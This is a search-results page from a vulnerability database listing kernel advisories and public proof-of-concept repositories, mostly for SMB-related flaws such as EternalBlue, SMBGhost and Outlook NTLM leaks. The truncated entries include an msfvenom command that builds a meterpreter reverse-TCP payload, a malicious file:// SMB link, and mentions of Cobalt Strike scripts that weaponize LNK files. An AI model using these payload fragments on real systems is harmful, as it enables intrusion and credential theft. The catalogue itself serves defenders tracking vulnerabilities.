Lucene search
+L

8966 matches found

RedHat Linux
RedHat Linux
added 2026/09/08 2:09 a.m.5 views

kernel: smb: client: validate DFS referral PathConsumed

A flaw was found in the Linux kernel's Server Message Block SMB client. A remote attacker could send a specially crafted SMB response containing a malformed Distributed File System DFS referral. This could cause the PathConsumed value to exceed the search name length, leading to an out-of-bounds...

9.1CVSS0.00513EPSS
SaveExploits0References5
RedHat Linux
RedHat Linux
added 2026/09/08 1:25 a.m.4 views

kernel: smb/client: fix out-of-bounds read in smb2_compound_op()

A flaw was found in the Linux kernel's Server Message Block SMB client. A remote attacker, acting as a malicious SMB server, could send a specially crafted, truncated response with an oversized buffer length. This could lead to an out-of-bounds read in the smb2compoundop function, allowing the...

9.1CVSS0.00478EPSS
SaveExploits0References5
AlmaLinux
AlmaLinux
added 2026/09/08 12:00 a.m.4 views

Important: kernel-rt security update

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Security Fixes: kernel: crypto: pcrypt - Fix handling of MAYBACKLOG requests CVE-2026-43493 kernel: netfilter: conntrack: remove sprintf usage...

9.8CVSS0.00695EPSS
SaveExploits0References16
Tenable Nessus
Tenable Nessus
added 2026/09/08 12:00 a.m.4 views

AlmaLinux 8 : kernel-rt (ALSA-2026:64770)

The remote AlmaLinux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ALSA-2026:64770 advisory. kernel: crypto: pcrypt - Fix handling of MAYBACKLOG requests CVE-2026-43493 kernel: netfilter: conntrack: remove sprintf usage CVE-2026-53002 kernel:...

9.8CVSS0.00695EPSS
SaveExploits0References9
Kitploit
Kitploit
added 2026/09/07 6:22 p.m.9 views

CVE-2023-38146-Poc

PoC para el exploit ThemeBleed CVE-2023-38146 Temas de Windows 11 Fuertemente inspirado por https://github.com/gabe-k/themebleed que solo funciona en Windows la razón por la que decidí escribir esto. Usé código modificado de impacket smbserver.py...

8.8CVSS7.8AI score0.39491EPSS
SaveExploits5References4
Kitploit
Kitploit
added 2026/09/07 5:30 p.m.6 views

CVE-2018-10583

CVE-2018-10583 An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by "xlink:href=file://192.168.0.2/test.jpg" within an "office:document-content...

7.5CVSS6.7AI score0.78342EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/07 4:49 p.m.5 views

CVE-2024-21413-Vulnerabilidad-Outlook-LAB

CVE-2024-21413 – Outlook LAB Vulnerability Vulnerability Description CVE-2024-21413 is a critical vulnerability discovered in Microsoft Outlook that allows a remote attacker to execute malicious links via a carefully crafted email. This exploit uses the file:// protocol to redirect victims to...

9.8CVSS8AI score0.9466EPSS
SaveExploits24References1
Kitploit
Kitploit
added 2026/09/07 4:37 p.m.6 views

CVE-2023-38146

PoC for the ThemeBleed CVE-2023-38146 exploit Windows 11 Themes Heavily inspired by https://github.com/gabe-k/themebleed which only runs on windows the reason why i decided to write this. Used modified code from the impacket smbserver.py...

8.8CVSS7.9AI score0.39491EPSS
SaveExploits5References3
Kitploit
Kitploit
added 2026/09/07 2:59 p.m.8 views

BIT-EternalBlue-for-macOS_Linux

BIT-EternalBlue-for-macOS&Linux Exploit CVE-2017-7494 for Net Security course final Assignment. This would reveal the vulnerability of services that run in administrative priority on OS. This bug is workable on both macOS and Linux. Install Before exploit, you need to download dependencies...

10CVSS7.7AI score0.99448EPSS
SaveExploits26
Kitploit
Kitploit
added 2026/09/07 2:53 p.m.5 views

cve-2020-0796

CVE-2020-0796 LPE CVE-2020-0796 SMBGhost LPE Usage Install Rust if you need it https://www.rust-lang.org/learn/get-started Compile the code: cargo build --release Copy the .exe from target/release/ to target and execute. References...

10CVSS8.2AI score0.9981EPSS
SaveExploits126
Kitploit
Kitploit
added 2026/09/07 2:52 p.m.5 views

CVE-2022-24500

CVE-2022-24500 RCE Exploit Windows SMB Remote Code Execution Vulnerability Vulnerability: Windows 7 - Windows 2022 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500 step 1 root@kitploit: msfvenom -p windows/meterpreter/reversetcp LHOST=192.10.22.105 LPORT=4444 -f raw...

8.8CVSS8.2AI score0.38049EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/07 2:50 p.m.4 views

VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint

Informe de VAPT sobre Explotación de SMB en un Endpoint Financiero con Windows 10 Este informe describe un compromiso estructurado de VAPT centrado en el cumplimiento de PCI DSS, la enumeración del servicio SMB y la explotación de CVE-2017-0144 EternalBlue en una máquina Windows 10 dentro de una...

9.3CVSS8AI score0.9923EPSS
SaveExploits65
Kitploit
Kitploit
added 2026/09/07 1:18 p.m.5 views

CVE-2023-23397_EXPLOIT

CVE-2023-23397 MS Outlook Vulnerability Exploitation CVE-2023-23397 is a vulnerability in Microsoft Outlook that allows an attacker to potentially exfiltrate user authentication details. The vulnerability stems from the ability of an attacker to specify a Universal Naming Convention UNC path in t...

9.8CVSS8.2AI score0.97408EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/07 12:10 p.m.4 views

CVE_2020_0796_CNA

CVE-2020-0796-CNA Modified based on the PoC provided by danigargu, implemented privilege escalation replication on Windows 10, and developed AggressorScripts based on the Reflective DLL project by stephenfewer and the interface provided by CobaltStrike documentation. This repository is only for...

10CVSS8.1AI score0.9981EPSS
SaveExploits126References2
Kitploit
Kitploit
added 2026/09/07 11:58 a.m.8 views

CVE-2025-24071_PoC

CVE-2025-24071PoC CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute...

6.5CVSS7.4AI score0.24638EPSS
SaveExploits22References1
Kitploit
Kitploit
added 2026/09/07 1:09 a.m.10 views

CVE-2026-3805-curl-SMB-UAF

CVE-2026-3805: Use-After-Free in curl SMB Connection Reuse I found a use-after-free vulnerability in libcurl's SMB protocol handler. When a second SMB transfer reuses an existing connection to the same server, the file path for the new request req-path is a dangling pointer to freed heap memory...

7.5CVSS7.9AI score0.00745EPSS
SaveExploits2References4
Kitploit
Kitploit
added 2026/09/07 12:46 a.m.7 views

CVE-2026-33829

CVE-2026-33829 This repository contains an automated Bash tool designed to passively and controllably audit and verify whether Windows OS assets are vulnerable to insecure manipulation of the search: protocol handler. The script acts as a passive listener, using tcpdump to capture outgoing...

4.3CVSS6AI score0.03447EPSS
SaveExploits5
Tenable Nessus
Tenable Nessus
added 2026/09/07 12:00 a.m.6 views

MiracleLinux 8 : kernel-4.18.0-553.157.1.el8_10 (AXSA:2026-1779:74)

The remote MiracleLinux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the AXSA:2026-1779:74 advisory. kernel: net: ieee802154: do not leave a dangling sk pointer in ieee802154create CVE-2024-56602 kernel: ip6gre: Use cached t-net in ip6erspanchangeli...

9.8CVSS0.00778EPSS
SaveExploits0References10
Kitploit
Kitploit
added 2026/09/06 8:24 p.m.5 views

CVE-2025-50154-Aggressor-Script

LNK Weaponizer - Script de Agressor de Cobalt Strike Un script completo de Agressor de Cobalt Strike que weaponiza y ejecuta archivos LNK maliciosos y archivos Library-MS para la divulgación de hashes NTLMv2-SSP de SMB. Incluye técnicas de evasión CVE-2025-24054. ⚠️ DESCARGO DE RESPONSABILIDAD Est...

6.5CVSS7AI score0.58909EPSS
SaveExploits21
Kitploit
Kitploit
added 2026/09/06 5:35 p.m.3 views

EternalBlue-Vulnerability-Scanner

EternalBlue Scanner A Python tool for scanning SMB-enabled devices for the EternalBlue vulnerability CVE-2017-0144. This script checks whether devices in a network are vulnerable to the EternalBlue exploit by testing SMB connections. ⚡ Features ✅ Scans a list of IP addresses for SMB vulnerability...

9.3CVSS7.9AI score0.9923EPSS
SaveExploits65
Rows per page
Query Builder